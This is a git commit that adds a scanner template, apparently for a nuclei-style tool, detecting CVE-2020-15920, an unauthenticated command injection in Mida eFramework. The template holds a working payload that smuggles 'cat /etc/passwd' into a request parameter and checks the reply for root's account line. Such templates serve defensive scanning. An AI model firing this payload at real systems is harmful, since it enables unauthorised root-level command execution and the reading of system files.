Merge pull request #391 from dwisiswant0/cve/CVE-2020-15920

Add CVE-2020-15920
2020-09-02 12:40:21 +05:30 · 2020-09-02 12:40:21 +05:30 · 4b8fb4774f
parent cc18ebdab5 455a98f771
commit 4b8fb4774f
1 changed files with 24 additions and 0 deletions
--- a/cves/CVE-2020-15920.yaml
+++ b/cves/CVE-2020-15920.yaml
@ -0,0 +1,24 @@
+id: CVE-2020-15920
+
+info:
+  name: Unauthenticated RCE at Mida eFramework on 'PDC/ajaxreq.php'
+  author: dwisiswant0
+  severity: critical
+  description: There is an OS Command Injection in Mida eFramework through 2.9.0 that allows an attacker to achieve Remote Code Execution (RCE) with administrative (root) privileges. No authentication is required.
+
+  # References:
+  # - https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html
+
+requests:
+  - method: POST
+    path:
+      - "{{BaseURL}}/PARAM=127.0.0.1+-c+0%3B+cat+%2Fetc%2Fpasswd&DIAGNOSIS=PING"
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: regex
+        regex:
+          - "root:[x*]:0:0:"
+        part: body